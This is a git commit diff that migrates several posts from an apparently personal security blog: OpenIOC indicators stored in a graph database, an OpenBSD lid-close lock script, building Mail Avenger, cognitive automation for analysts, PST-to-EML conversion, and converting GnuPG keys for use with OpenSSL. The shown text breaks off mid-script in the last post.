initial migration
All checks were successful
Export / Explore-GitHub-Actions (push) Successful in 2m19s
All checks were successful
Export / Explore-GitHub-Actions (push) Successful in 2m19s
This commit is contained in:
parent
63ff6b2009
commit
805a34f937
30 changed files with 4963 additions and 9 deletions
1
.gitignore
vendored
Normal file
1
.gitignore
vendored
Normal file
|
@ -0,0 +1 @@
|
||||||
|
drafts/*
|
240
data/an-openioc-graph-a-different-kind-of-rule-scheme.md
Normal file
240
data/an-openioc-graph-a-different-kind-of-rule-scheme.md
Normal file
|
@ -0,0 +1,240 @@
|
||||||
|
Despite that I think that implementing a full-fledged
|
||||||
|
XML-editor is too complex for an operational scenario, I
|
||||||
|
believe the OpenIOC-format, which has been in the works at
|
||||||
|
Mandiant for a couple of years now, is quite good. They also
|
||||||
|
have the IOC Writer which was launched at last summers Black
|
||||||
|
Hat. OpenIOC can export to other expression languages, such
|
||||||
|
as Yara [1], as well.
|
||||||
|
|
||||||
|
I have been thinking of a way to combine graph knowledge
|
||||||
|
with exactly that for a while, an expressive detection
|
||||||
|
language based on a graph. If combining two things you love,
|
||||||
|
I have learned that it simply can't end badly, it must end
|
||||||
|
with something amazing. Let's give it a try!
|
||||||
|
|
||||||
|
So I went about it, starting off by importing a sample
|
||||||
|
Maltego-graph to Titan on HBase [2]. I basically set out
|
||||||
|
with five connected nodes in Maltego Tungsten. Nothing
|
||||||
|
malicious, just a national newspaper.
|
||||||
|
|
||||||
|
Running that through my Rexster migration script results in
|
||||||
|
a equivalent graph on the Rexster server.
|
||||||
|
|
||||||
|
It's nice considering if you'd like to put it in a larger
|
||||||
|
context with millions or billions of vertices you would like
|
||||||
|
to trigger on. That is out of bounds for Maltego, or your
|
||||||
|
desktop system in general.
|
||||||
|
|
||||||
|
|
||||||
|
## The OpenIOC Part
|
||||||
|
|
||||||
|
If looking at the graphs above, you will probably agree that
|
||||||
|
it isn't especially describing of certain incidents or other
|
||||||
|
contextual data. But what if we could combine the graph with
|
||||||
|
something like OpenIOC? Turns out that it's conceptually
|
||||||
|
similar. The weakness of OpenIOC is that it doesn't scale
|
||||||
|
when firing up an OpenIOC editor - like the one Mandiant
|
||||||
|
have created. On the other hand, if you could traverse a
|
||||||
|
graph with OpenIOC designed around the OpenIOC format..
|
||||||
|
|
||||||
|
Let's create a basic writer as a demonstration, which
|
||||||
|
operates on the root level (no nesting of rules in this
|
||||||
|
example).
|
||||||
|
|
||||||
|
from ioc_writer import ioc_api
|
||||||
|
from lxml import etree as et
|
||||||
|
|
||||||
|
class IOC:
|
||||||
|
def __init__(self):
|
||||||
|
self.IOC = ioc_api.IOC(name='Test', description='An IOC generated from a Python script', author='Someone')
|
||||||
|
|
||||||
|
self.IOC.set_created_date()
|
||||||
|
self.IOC.set_published_date()
|
||||||
|
self.IOC.set_lastmodified_date()
|
||||||
|
self.IOC.update_name('test_rexster')
|
||||||
|
self.IOC.update_description('A Test')
|
||||||
|
self.id = self.IOC.iocid
|
||||||
|
|
||||||
|
def addNode(self,label,text,type,indicator,condition='is'):
|
||||||
|
IndicatorItem_node = ioc_api.make_IndicatorItem_node(condition, label, text, type, indicator)
|
||||||
|
current_guid = IndicatorItem_node.attrib['id']
|
||||||
|
print current_guid
|
||||||
|
self.IOC.top_level_indicator.append(IndicatorItem_node)
|
||||||
|
|
||||||
|
def __str__(self):
|
||||||
|
self.xml = et.tostring(self.IOC.root, encoding='utf-8', xml_declaration=True, pretty_print=True)
|
||||||
|
return self.xml
|
||||||
|
|
||||||
|
This enables us to do something like this:
|
||||||
|
|
||||||
|
ioc = IOC()
|
||||||
|
ioc.addNode('test','Just a test','domain','vg.no')
|
||||||
|
print ioc
|
||||||
|
|
||||||
|
Which will again return the XML of the IOC.
|
||||||
|
|
||||||
|
<?xml version='1.0' encoding='utf-8'?>
|
||||||
|
<OpenIOC xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns="http://openioc.org/schemas/OpenIOC_1.1" id="06fd70db-992c-4678-83e6-8f1b150e8bcf" last-modified="2014-01-28T07:15:09" published-date="2014-01-28T07:15:09">
|
||||||
|
<metadata>
|
||||||
|
<short_description>test</short_description>
|
||||||
|
<description>A Test</description>
|
||||||
|
<keywords/>
|
||||||
|
<authored_by>Someone</authored_by>
|
||||||
|
<authored_date>2014-01-28T07:15:09</authored_date>
|
||||||
|
<links/>
|
||||||
|
</metadata>
|
||||||
|
<criteria>
|
||||||
|
<Indicator id="fbbb2883-473a-4a1c-92c4-692e199adb61" operator="OR">
|
||||||
|
<IndicatorItem id="14a42d26-b056-4b2e-a327-7d6edb25457e" condition="is" preserve-case="false" negate="false">
|
||||||
|
<Context document="test" search="Just a test" type="mir"/>
|
||||||
|
<Content type="domain">vg.no</Content>
|
||||||
|
<IndicatorItem id="dff6e0c5-613b-4bea-8bad-bb7a36b3ccdf" condition="is" preserve-case="false" negate="false">
|
||||||
|
<Context document="test" search="Just a test" type="mir"/>
|
||||||
|
<Content type="ip">195.88.55.16</Content>
|
||||||
|
</IndicatorItem>
|
||||||
|
</IndicatorItem>
|
||||||
|
</Indicator>
|
||||||
|
</criteria>
|
||||||
|
<parameters/>
|
||||||
|
</OpenIOC>
|
||||||
|
|
||||||
|
Reviewing the XML above you might notice that the scheme is
|
||||||
|
pretty transferrable to a graph, perhaps even simplifying of
|
||||||
|
the IOC XML. Be especially aware on the following tags and
|
||||||
|
attributes:
|
||||||
|
|
||||||
|
* Content
|
||||||
|
* The IndicatorItem condition
|
||||||
|
* The content type
|
||||||
|
|
||||||
|
A nested IOC might look like this (relevant excerpt):
|
||||||
|
|
||||||
|
<Indicator id="b12f8c27-d168-49b5-bc75-cec86bf21d3f" operator="OR">
|
||||||
|
<IndicatorItem id="af4323dc-a967-4fe3-b62f-b461b90a3550" condition="is" preserve-case="false" negate="false">
|
||||||
|
<Context document="test" search="Just a test" type="mir"/>
|
||||||
|
<Content type="domain">vg.no</Content>
|
||||||
|
<IndicatorItem id="2ff639ca-dcec-4967-ac06-f54989bf3dc4" condition="is" preserve-case="false" negate="false">
|
||||||
|
<Context document="test" search="Just a test" type="mir"/>
|
||||||
|
<Content type="ip">195.88.55.16</Content>
|
||||||
|
</IndicatorItem>
|
||||||
|
</IndicatorItem>
|
||||||
|
</Indicator>
|
||||||
|
|
||||||
|
The above implies that the domain vg.no needs to be
|
||||||
|
accompanied with the IP-address ``195.88.55.16``.
|
||||||
|
|
||||||
|
## Merging the Best of Two Worlds
|
||||||
|
|
||||||
|
So now that we have had a look at the power in the structure
|
||||||
|
of a graph and the power of expression in the OpenIOC
|
||||||
|
XML-indicators, you might see why this is the best of two
|
||||||
|
worlds.
|
||||||
|
|
||||||
|
In the challenge of combining them both I perhaps
|
||||||
|
oversimplified the nesting and used the two previously
|
||||||
|
mentioned attributes in the graph, adding the content as the
|
||||||
|
value of the node and the condition. We will also have to
|
||||||
|
add the type attribute since that tells us what type of
|
||||||
|
OpenIOC entry we have when reversing the process later
|
||||||
|
on. We will have a small collision between Maltego and
|
||||||
|
OpenIOC, since for instance an IP-address type will
|
||||||
|
differ. So for now you will need two type attributes, one
|
||||||
|
for Maltego and one for OpenIOC (if you plan to go both
|
||||||
|
ways). This is left as an exersise for the reader.
|
||||||
|
|
||||||
|
Creating an OpenIOC-compatible graph is a breeze:
|
||||||
|
|
||||||
|
from rexpro import RexProConnection
|
||||||
|
|
||||||
|
class Graph:
|
||||||
|
def __init__(self):
|
||||||
|
self.graph = RexProConnection('localhost',8184,'titan')
|
||||||
|
|
||||||
|
def addVertice(self,content,content_type,condition):
|
||||||
|
vertice_id = self.graph.execute("""
|
||||||
|
def v1 = g.addVertex([content:content,content_type:content_type,condition:condition])
|
||||||
|
return v1""",
|
||||||
|
{'content':content, 'content_type':content_type, 'condition':condition})
|
||||||
|
return vertice_id
|
||||||
|
|
||||||
|
def addEdge(self,vid1,vid2,label):
|
||||||
|
edge = self.graph.execute("""
|
||||||
|
def v1 = g.v(vid1)
|
||||||
|
def v2 = g.v(vid2)
|
||||||
|
g.addEdge(v1, v2, label)
|
||||||
|
g.commit()""",{'vid1':vid1['_id'], 'vid2':vid2['_id'], 'label':label})
|
||||||
|
|
||||||
|
graph=Graph()
|
||||||
|
v1=graph.addVertice('vg.no','domain','is')
|
||||||
|
v2=graph.addVertice('195.88.55.16','ip','is')
|
||||||
|
graph.addEdge(v1,v2,'and')
|
||||||
|
|
||||||
|
If you'd like to go the other way again in order to talk to
|
||||||
|
other organisations perhaps, you will want to run the
|
||||||
|
process in reverse:
|
||||||
|
|
||||||
|
from rexpro import RexProConnection
|
||||||
|
|
||||||
|
class RexsterIOC:
|
||||||
|
def __init__(self):
|
||||||
|
self.graph = RexProConnection('localhost',8184,'titan')
|
||||||
|
|
||||||
|
self.IOC = ioc_api.IOC(name='Test', description='A test IOC generated from Rexster', author='Someone')
|
||||||
|
|
||||||
|
self.IOC.set_created_date()
|
||||||
|
self.IOC.set_published_date()
|
||||||
|
self.IOC.set_lastmodified_date()
|
||||||
|
#IOC.add_link('help', self.baseurl + url)
|
||||||
|
self.IOC.update_name('test')
|
||||||
|
self.IOC.update_description('A Test')
|
||||||
|
self.id = self.IOC.iocid
|
||||||
|
self.lastId=None
|
||||||
|
|
||||||
|
def addNode(self,label,text,type,indicator,condition='is',addToLast=False):
|
||||||
|
IndicatorItem_node = ioc_api.make_IndicatorItem_node(condition, label, text, type, indicator)
|
||||||
|
|
||||||
|
if addToLast and self.last:
|
||||||
|
self.last.append(IndicatorItem_node)
|
||||||
|
else:
|
||||||
|
self.IOC.top_level_indicator.append(IndicatorItem_node)
|
||||||
|
|
||||||
|
current_guid = IndicatorItem_node.attrib['id']
|
||||||
|
self.last = IndicatorItem_node
|
||||||
|
|
||||||
|
def traverse(self,rootNodeId):
|
||||||
|
root=self.graph.execute("""return g.v(80284)""",{'vid':str(rootNodeId)})
|
||||||
|
self.addNode('test','Just a test',
|
||||||
|
root['_properties']['content_type'],
|
||||||
|
root['_properties']['content'],
|
||||||
|
root['_properties']['condition'])
|
||||||
|
|
||||||
|
one_level_out=self.graph.execute("""return g.v(vid).out""",{'vid':str(rootNodeId)})
|
||||||
|
for vertex in one_level_out:
|
||||||
|
self.addNode('test','Just a test',
|
||||||
|
vertex['_properties']['content_type'],
|
||||||
|
vertex['_properties']['content'],
|
||||||
|
vertex['_properties']['condition'],addToLast=True)
|
||||||
|
|
||||||
|
def __str__(self):
|
||||||
|
self.xml = et.tostring(self.IOC.root, encoding='utf-8', xml_declaration=True, pretty_print=True)
|
||||||
|
return self.xml
|
||||||
|
|
||||||
|
ioc = RexsterIOC()
|
||||||
|
ioc.traverse(80284) # the root node
|
||||||
|
print ioc
|
||||||
|
|
||||||
|
One thing that you can now do is to store the indicators
|
||||||
|
with the rest of your network data. This again will imply
|
||||||
|
that the edges are created automatically without any need to
|
||||||
|
actually run jobs to combine data for detecting stuff.
|
||||||
|
|
||||||
|
That's my small concept demonstration. I think it's pretty
|
||||||
|
cool!
|
||||||
|
|
||||||
|
I've put the scripts in a Gist for you if you'd like to give
|
||||||
|
it a try [3].
|
||||||
|
|
||||||
|
|
||||||
|
[1] Yara: https://github.com/mandiant/ioc_writer/tree/master/examples/openioc_to_yara
|
||||||
|
[2] Importing a sample Maltego-graph to Titan on HBase: https://gist.github.com/tommyskg/8166472
|
||||||
|
[3] the scripts out there: https://gist.github.com/tommyskg/8671318
|
56
data/apm-lock.md
Normal file
56
data/apm-lock.md
Normal file
|
@ -0,0 +1,56 @@
|
||||||
|
I have used OpenBSD for some time now and one of the things that I
|
||||||
|
have had to work a bit on to get the way I like it, is locking the
|
||||||
|
terminal upon apmd suspend. In other words locking the terminals
|
||||||
|
when I close the lid.
|
||||||
|
|
||||||
|
Since it is a bit of code and that I reuse it other places, I
|
||||||
|
created this as a separate helper script. Thus, my
|
||||||
|
``/etc/apm/suspend``-reference is:
|
||||||
|
|
||||||
|
```
|
||||||
|
#!/bin/ksh
|
||||||
|
|
||||||
|
lock.sh&
|
||||||
|
sleep 3
|
||||||
|
```
|
||||||
|
|
||||||
|
The suspend file executes every time the lid is closed.
|
||||||
|
|
||||||
|
Once upon a time I probably used different sources for this, but
|
||||||
|
anyways the script that I currently use are two-fold. The first
|
||||||
|
part locks all xenodm sessions with xlock:
|
||||||
|
|
||||||
|
```
|
||||||
|
CMD_LOCK="xlock"
|
||||||
|
|
||||||
|
# get all currently running xenodm sessions
|
||||||
|
XSESSION=$(ps -axo user,ppid,args|awk '/xenodm\/Xsession/ { print
|
||||||
|
$1,$2}')
|
||||||
|
|
||||||
|
# lock all logged in X sessions
|
||||||
|
for SESSION in "$XSESSION"; do
|
||||||
|
_USER=$(echo $SESSION | cut -f1 -d' ')
|
||||||
|
_PPID=$(echo $SESSION | cut -f2 -d' ')
|
||||||
|
_DISPLAY=$(ps -p $_PPID -o args=|cut -d' ' -f2)
|
||||||
|
su - $_USER -c "export DISPLAY=\"$_DISPLAY\" && $CMD_LOCK" &
|
||||||
|
done
|
||||||
|
```
|
||||||
|
|
||||||
|
The second part of the script kills all active consoles. This is
|
||||||
|
the most important part for me, since I most often lock the
|
||||||
|
screen, but forget to log off the consoles.
|
||||||
|
|
||||||
|
```
|
||||||
|
# kill open console TTYs
|
||||||
|
OPEN_TTYS=$(who|awk '{print $2}'|fgrep ttyC)
|
||||||
|
for _TTY in $OPEN_TTYS; do
|
||||||
|
T=$(echo $_TTY|sed 's/tty//');
|
||||||
|
TTY_PID=$(ps -t $T|fgrep -v COMMAND|fgrep "ksh (ksh)"|awk '{print $1}');
|
||||||
|
kill -9 $TTY_PID;
|
||||||
|
done
|
||||||
|
```
|
||||||
|
|
||||||
|
Please also be aware that suspending the laptop will leave things
|
||||||
|
in plaintext, in memory, so to truly be resistant to an evil maid
|
||||||
|
vector you would need to power off the laptop when out of a
|
||||||
|
controlled area.
|
27
data/avenger-openbsd68.md
Normal file
27
data/avenger-openbsd68.md
Normal file
|
@ -0,0 +1,27 @@
|
||||||
|
Those following me on the Fediverse has recently become familiar
|
||||||
|
with an old-school program called Mail Avenger.
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
mkdir ~/.avenger
|
||||||
|
openssl rand -base64 8 | shasum | head -c16 > ~/.avenger/.macpass
|
||||||
|
echo "" >> ~/.avenger/.macpass
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
brew install berkeley-db4
|
||||||
|
curl -O http://www.mailavenger.org/dist/avenger-0.8.5.tar.gz
|
||||||
|
echo "b0fc3e2e03ed010e95e561367fce7b087968df7ea6056251eba95cad14d26d37 avenger-0.8.5.tar.gz" | shasum -a 256 --check
|
||||||
|
tar xvzf avenger-0.8.5.tar.gz
|
||||||
|
cd avenger-0.8.5
|
||||||
|
./configure --with-db=/usr/local/Cellar/berkeley-db@4/4.8.30
|
||||||
|
cd util
|
||||||
|
make macutil && install macutil ~/.local/bin/
|
||||||
|
```
|
||||||
|
|
||||||
|
```
|
||||||
|
macutil --expire=+2M --from "Tommy S" --fromexp "address expires" --sender "t+return+*@252.no"
|
||||||
|
```
|
||||||
|
|
105
data/cognitive-automation.md
Normal file
105
data/cognitive-automation.md
Normal file
|
@ -0,0 +1,105 @@
|
||||||
|
There is a lot of hype around many things in cyber
|
||||||
|
security. One concept that is not, is called Cognitive
|
||||||
|
Automation (CA). CA can be explained by comparing it to
|
||||||
|
traditional automation. That is, how tasks are automated:
|
||||||
|
like alerts correlation. By using cognitive automation, the
|
||||||
|
way the mind works is taken into account. I believe many
|
||||||
|
security professionals will recognise the practical aspects
|
||||||
|
of Schulte's model for "Complexity of automation vs
|
||||||
|
effectiveness/safety" [1].
|
||||||
|
|
||||||
|
I've written a post on this topic years ago ("The Role of
|
||||||
|
Cognitive Automation in Information Security"), but
|
||||||
|
unluckily that was lost in migration. It probably needed an
|
||||||
|
update anyways, and I believe the cyber security field is
|
||||||
|
more mature to receive this input now rather than at that
|
||||||
|
point.
|
||||||
|
|
||||||
|
Cognitive automation is strongly applied in the aerospace
|
||||||
|
industry for instance. In aerospace, long ago, there was a
|
||||||
|
realisation that the strengths of thee human-being is the
|
||||||
|
ability to learn, instinct, problem reduction, ability of
|
||||||
|
abstraction and several others. The machine’s strength is
|
||||||
|
parallel processing, objectivity, long-term monitoring,
|
||||||
|
complex planning and decision making and so on. Schulte
|
||||||
|
describes this concept in detail, in Man-Machine Cooperation
|
||||||
|
model [1].
|
||||||
|
|
||||||
|
In order to benefit from a similar model in cyber security
|
||||||
|
there is a need to evolve the way data is extracted,
|
||||||
|
preprocessed and prepared for human-machine interaction. As
|
||||||
|
may be recognised at this point there are already technology
|
||||||
|
available to provide parallel processing on the machine
|
||||||
|
part. How a computing cluster would solve such a problem is
|
||||||
|
the evident problem. In that regard, machine learning is the
|
||||||
|
most promising technique to structure and classify the data
|
||||||
|
which seems to scale really well. Efficiently ingesting,
|
||||||
|
storing and preprocessing the data is the first stage of
|
||||||
|
that challenge.
|
||||||
|
|
||||||
|
Another detail that I would like to point out here, from the
|
||||||
|
great book "The Multitasking Mind" by Salvucci and Taatgen,
|
||||||
|
is how the human mind works with buffers (the aural, visual,
|
||||||
|
declarative, goal, manual and problem buffers). A human can
|
||||||
|
actually only handle one thing at once. So when analysts are
|
||||||
|
tasked with several simultaneous tasks or roles, this will
|
||||||
|
definitively produce bad quality results. This is really
|
||||||
|
important to understand to all cyber security seniors and
|
||||||
|
designers, so read the book.
|
||||||
|
|
||||||
|
Back to how this applies in practical terms: when analysts
|
||||||
|
manually analyse and decide by expert knowledge, classifying
|
||||||
|
the attributes of full content data and e.g. creates Yara
|
||||||
|
and Snort signatures, it is a reasonable assumption that a
|
||||||
|
number of relevant attributes are never evaluated as
|
||||||
|
potential anomalies. This greatly increases the
|
||||||
|
possibilities of the threat groups. In aerospace cognitive
|
||||||
|
automation there is a concept called Mission Management,
|
||||||
|
that is similar to the problem described here.
|
||||||
|
|
||||||
|
Now for a practical example of how cognitive automation can
|
||||||
|
work, this time paralleled with the approach taken by
|
||||||
|
Netflix to movie recommenders. Let's say that you have
|
||||||
|
stored the PDFiD [2] vector of all PDF documents over the
|
||||||
|
last ten years, passing through a network. The vector
|
||||||
|
structure will look like:
|
||||||
|
|
||||||
|
```
|
||||||
|
obj,endobj,stream,endstream,xref,trailer,startxref,/Page,/Encrypt,/JS,/JavaScript,/AA,/OpenAction,/JBIG2Decode
|
||||||
|
```
|
||||||
|
|
||||||
|
or:
|
||||||
|
|
||||||
|
```
|
||||||
|
1. 7,7,1,1,1,1,1,1,0,1,1,0,1,0
|
||||||
|
[...]
|
||||||
|
```
|
||||||
|
|
||||||
|
If 500 PDF files passes through the systems each day on
|
||||||
|
average, that will be 1825' documents over those ten
|
||||||
|
years. In addition qtime is a significant part of that
|
||||||
|
vector - and other parameters could be file names and so on.
|
||||||
|
|
||||||
|
If an analyst receives a suspicious PDF file. That file may
|
||||||
|
initially hard to classify by the analyst. In such a case
|
||||||
|
the system should propose other related files to look
|
||||||
|
at. Practically speaking this saves the analyst cognitive
|
||||||
|
capacity to use instict, pattern recognition and creativity
|
||||||
|
to classify the document. The machine on the other hand
|
||||||
|
maintains objectivity, has great stress resistance, can
|
||||||
|
retrieve a lot more information, and it can process and
|
||||||
|
pivot on all those 10 years of documents as opposed to the
|
||||||
|
analyst.
|
||||||
|
|
||||||
|
Now that you have gotten an introduction to the world of
|
||||||
|
cognitive automation, I hope this will drive a discussion on
|
||||||
|
how we can take our field to the next level. I am confident
|
||||||
|
that this means understanding and solving problems before
|
||||||
|
attempting to buy our way out of them.
|
||||||
|
|
||||||
|
|
||||||
|
[1] Schulte, D. A. 2002. Mission management and crew assistance for military aircraft: cognitive concepts and prototype evaluation.
|
||||||
|
[2] PDFiD: https://blog.didierstevens.com/2009/03/31/pdfid/
|
||||||
|
|
||||||
|
|
||||||
|
|
100
data/converting-pst.md
Normal file
100
data/converting-pst.md
Normal file
|
@ -0,0 +1,100 @@
|
||||||
|
Some time ago I gave an introduction to converting Microsoft
|
||||||
|
MSG files [1] to a readable RFC 2822 [2] format on Linux. In
|
||||||
|
fact you will sometimes get an even kinkier format to work
|
||||||
|
with: The Outlook Data File (PST) [3]. PST files is a
|
||||||
|
proprietary format used by Microsoft Outlook, and is the
|
||||||
|
equivalent of the mbox on Linux.
|
||||||
|
|
||||||
|
**Edit August 29th**: Also have a look at the more
|
||||||
|
up-to-date [4].
|
||||||
|
|
||||||
|
Even though PST files are a bit harder to read than single
|
||||||
|
EML files, there is hope if you only have a Linux client:
|
||||||
|
libpst, and more specifically readpst. For libpst you need
|
||||||
|
three libraries:
|
||||||
|
|
||||||
|
* ``libgsf`` (i/o library that can read and write common file
|
||||||
|
types and handle structured formats that provide
|
||||||
|
file-system-in-a-file semantics)
|
||||||
|
* boost (portable C++ source libraries)
|
||||||
|
* libpst
|
||||||
|
|
||||||
|
On OS X you can install it by:
|
||||||
|
|
||||||
|
```
|
||||||
|
brew install libgsf
|
||||||
|
brew install boost
|
||||||
|
brew install libpst
|
||||||
|
```
|
||||||
|
|
||||||
|
Now if you have a pst archive, like [5] for instance, you can
|
||||||
|
convert it by:
|
||||||
|
|
||||||
|
mkdir export
|
||||||
|
readpst -M -b -e -o export "Personal Folders.pst"
|
||||||
|
|
||||||
|
This should give an output like this:
|
||||||
|
|
||||||
|
Opening PST file and indexes...
|
||||||
|
Processing Folder "Deleted Items"
|
||||||
|
Processing Folder "Inbox"
|
||||||
|
Processing Folder "latest"
|
||||||
|
[...]
|
||||||
|
Processing Folder "Reports"
|
||||||
|
"Reports" - 11 items done, 1 items skipped.
|
||||||
|
Processing Folder "Quotes"
|
||||||
|
"Quotes" - 1 items done, 1 items skipped.
|
||||||
|
Processing Folder "Printer"
|
||||||
|
"Printer" - 1 items done, 1 items skipped.
|
||||||
|
Processing Folder "Passwords"
|
||||||
|
"Passwords" - 6 items done, 1 items skipped.
|
||||||
|
[...]
|
||||||
|
Processing Folder "Kum Team"
|
||||||
|
"Kum Team" - 37 items done, 0 items skipped.
|
||||||
|
"9NT1425(India 11.0)" - 228 items done, 1 items skipped.
|
||||||
|
Processing Folder "Jimmi"
|
||||||
|
"Jimmi" - 31 items done, 0 items skipped.
|
||||||
|
"Inbox" - 27 items done, 11 items skipped.
|
||||||
|
Processing Folder "Outbox"
|
||||||
|
Processing Folder "Sent Items"
|
||||||
|
"Sent Items" - 0 items done, 1 items skipped.
|
||||||
|
Processing Folder "Calendar"
|
||||||
|
"Calendar" - 0 items done, 6 items skipped.
|
||||||
|
Processing Folder "Contacts"
|
||||||
|
"Contacts" - 0 items done, 1 items skipped.
|
||||||
|
[...]
|
||||||
|
Processing Folder "Drafts"
|
||||||
|
Processing Folder "RSS Feeds"
|
||||||
|
Processing Folder "Junk E-mail"
|
||||||
|
Processing Folder "quarantine"
|
||||||
|
"My Personal Folder" - 13 items done, 0 items skipped.
|
||||||
|
|
||||||
|
Which creates a directory structure like ``ls -l 'export/My
|
||||||
|
Personal Folder'``:
|
||||||
|
|
||||||
|
drwxr-xr-x 2 - staff 68 Aug 28 21:34 Calendar
|
||||||
|
drwxr-xr-x 2 - staff 68 Aug 28 21:34 Contacts
|
||||||
|
drwxr-xr-x 29 - staff 986 Aug 28 21:34 Inbox
|
||||||
|
drwxr-xr-x 2 - staff 68 Aug 28 21:34 Journal
|
||||||
|
drwxr-xr-x 2 - staff 68 Aug 28 21:34 Sent Items
|
||||||
|
drwxr-xr-x 2 - staff 68 Aug 28 21:34 Tasks
|
||||||
|
|
||||||
|
If you sample ``Inbox/Mails/``, you will find:
|
||||||
|
|
||||||
|
1.eml 10.eml 11.eml 12.eml 13.eml 14.eml 15.eml 16.eml 17.eml 2.eml 3.eml 4.eml 5.eml 6.eml 7.eml 8.eml 9.eml
|
||||||
|
|
||||||
|
You can now continue with our previous post [6]. I'll also
|
||||||
|
encourage you to have a look at the documentation of the
|
||||||
|
Outlook PST format [7].
|
||||||
|
|
||||||
|
|
||||||
|
[1] Converting Microsoft MSG files: /2013-10-08-msg-eml.html
|
||||||
|
[2] RFC 2822: http://tools.ietf.org/html/rfc2822
|
||||||
|
[3] The Outlook Data File (PST): http://office.microsoft.com/en-001/outlook-help/introduction-to-outlook-data-files-pst-and-ost-HA010354876.aspx
|
||||||
|
[4] libpff: /converting-pst-archives-in-os-xlinux-with-libpff
|
||||||
|
[5] Example PST file: http://sourceforge.net/projects/pstfileup/files/Personal%20Folders.pst/download
|
||||||
|
[6] Reading MSG and EML Files on OSX/Linux Command Line: :4443/forensics/reading-msg-files-in-linux-command-line/
|
||||||
|
[7] The outlook.pst format: http://www.five-ten-sg.com/libpst/rn01re05.html
|
||||||
|
|
||||||
|
|
||||||
|
|
126
data/gpg-openssl.md
Normal file
126
data/gpg-openssl.md
Normal file
|
@ -0,0 +1,126 @@
|
||||||
|
## Key Takeaways
|
||||||
|
|
||||||
|
* PGP are replaceable with native OpenSSL RSA public key crypto
|
||||||
|
and AES-256 keys.
|
||||||
|
* This approach simplifies crypto operations, and only requires
|
||||||
|
OpenSSL which is widely available.
|
||||||
|
* Existing PGP keys stored in GnuPG work with OpenSSL via `gpgsm`.
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
|
||||||
|
The rabbit hole mission of mine to get rid of PGP continues.
|
||||||
|
|
||||||
|
Lately I have been looking into converting PGP keys from GnuPG to
|
||||||
|
OpenSSL. This way I can send encrypted data to people not using my
|
||||||
|
OpenSSL-only approach. After all, most people still depend on PGP
|
||||||
|
and it is the format they publish their public keys in.
|
||||||
|
|
||||||
|
## Exporting A PGP Public Key for Encryption Using OpenSSL
|
||||||
|
|
||||||
|
A PGP key cannot be directly read by OpenSSL, but GPG can natively
|
||||||
|
export to SSH and ssh-keygen to PKCS8:
|
||||||
|
|
||||||
|
```
|
||||||
|
gpg --export-ssh-key <key-id>! > /tmp/test.pub
|
||||||
|
ssh-keygen -f /tmp/test.pub -e -m PKCS8 > /tmp/test.pem
|
||||||
|
```
|
||||||
|
|
||||||
|
The above pubkey can be used to encrypt data with OpenSSL as shown
|
||||||
|
on my [contact page](https://contact.252.no):
|
||||||
|
|
||||||
|
```
|
||||||
|
KEY=`openssl rand -hex 32` IV=`openssl rand -hex 16`
|
||||||
|
ENCRYPTED_KEY_B64=`openssl pkeyutl -encrypt -pubin -inkey /tmp/test.pem -pkeyopt rsa_padding_mode:oaep <<< $KEY|base64`
|
||||||
|
BLOB=`openssl enc -aes-256-cfb -a -e -K ${KEY} -iv ${IV} -in some-file`
|
||||||
|
echo "PKCS11-VAULT;aes-256-cfb;rsa_padding_mode:oaep;$ENCRYPTED_KEY_B64:$IV:$BLOB;" > encrypted.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
The steps of the above are:
|
||||||
|
|
||||||
|
1. Create an initialization vector [1] and an encryption key
|
||||||
|
2. Encrypt the one-time key to test.pem (our exported PGP-key)
|
||||||
|
3. Encrypt `some-file` using the key and IV using 256 bits AES in CFB-mode
|
||||||
|
4. Format the output in my PV-format.
|
||||||
|
|
||||||
|
Store `encrypted.txt` for decryption in the next section.
|
||||||
|
|
||||||
|
## Exporting a PGP Private Key for Decryption Using OpenSSL
|
||||||
|
|
||||||
|
This part is a bit more complex. For the sake of an example, let
|
||||||
|
us say you received an encrypted blob with an IV and encrypted
|
||||||
|
key, using the approach shown in the former section. You have the
|
||||||
|
key stored in GnuPG.
|
||||||
|
|
||||||
|
`gpgsm` can export your private key to p12, which is readable for
|
||||||
|
OpenSSL [2].
|
||||||
|
|
||||||
|
First list your secret keys in the GnuPG store: `gpg
|
||||||
|
--list-secret-keys --with-keygrip`.
|
||||||
|
|
||||||
|
Convert the key to X.509 by: `gpgsm --gen-key -o
|
||||||
|
/tmp/temp.crt`. You need to fill the values requested:
|
||||||
|
|
||||||
|
* Select "existing key"
|
||||||
|
* Fill the keygrip from the GPG secret key listing. Make sure you
|
||||||
|
use the right key, since GPG generates several keys behind the
|
||||||
|
scenes (the encryption key)
|
||||||
|
* Fill the cn (this needs to be on the format "cn=...") and e-mail
|
||||||
|
* Accept the other values as empty and accept the creation
|
||||||
|
|
||||||
|
Now import the certificate into `gpgsm`: `gpgsm --import
|
||||||
|
/tmp/temp.crt`. When imported, find the key ID by: `gpgsm
|
||||||
|
--list-keys`.
|
||||||
|
|
||||||
|
Using the key ID, you can now export the key in p12-format.
|
||||||
|
|
||||||
|
```
|
||||||
|
gpgsm -o /tmp/$keyid.p12 --export-secret-key-p12 $keyid
|
||||||
|
openssl pkcs12 -in /tmp/$key.p12 -nodes -nocerts|tail -n +5 > /tmp/$key.key
|
||||||
|
```
|
||||||
|
|
||||||
|
You only need to do the conversion once and now have your key in
|
||||||
|
`/tmp/$key.key`. This should be secured accordingly, and have a
|
||||||
|
password set as is offered in the guidance by gpgsm.
|
||||||
|
|
||||||
|
The resulting `/tmp/$key.key` is usable for decrypting content
|
||||||
|
encrypted by the public key. To decrypt the data in `encrypted.txt`:
|
||||||
|
|
||||||
|
```
|
||||||
|
IFS=';' read IDENTIFIER ALGORITHM PADDING_MODE ENCRYPTION_BLOBS SIGNATURE < encrypted.txt
|
||||||
|
|
||||||
|
for BLOB in ${ENCRYPTION_BLOBS[@]}; do
|
||||||
|
IFS=':' read ENCRYPTED_KEY_B64 IV TEXTFILE_ENC <<< $BLOB
|
||||||
|
ENCRYPTED_KEY=`printf $ENCRYPTED_KEY_B64 | base64 -d`
|
||||||
|
decrypted=false
|
||||||
|
DECRYPTED_KEY=`echo $ENCRYPTED_KEY_B64 |base64 -d | openssl pkeyutl -decrypt -inkey /tmp/$key.key -pkeyopt ${PADDING_MODE} 2> /dev/null` && decrypted=true
|
||||||
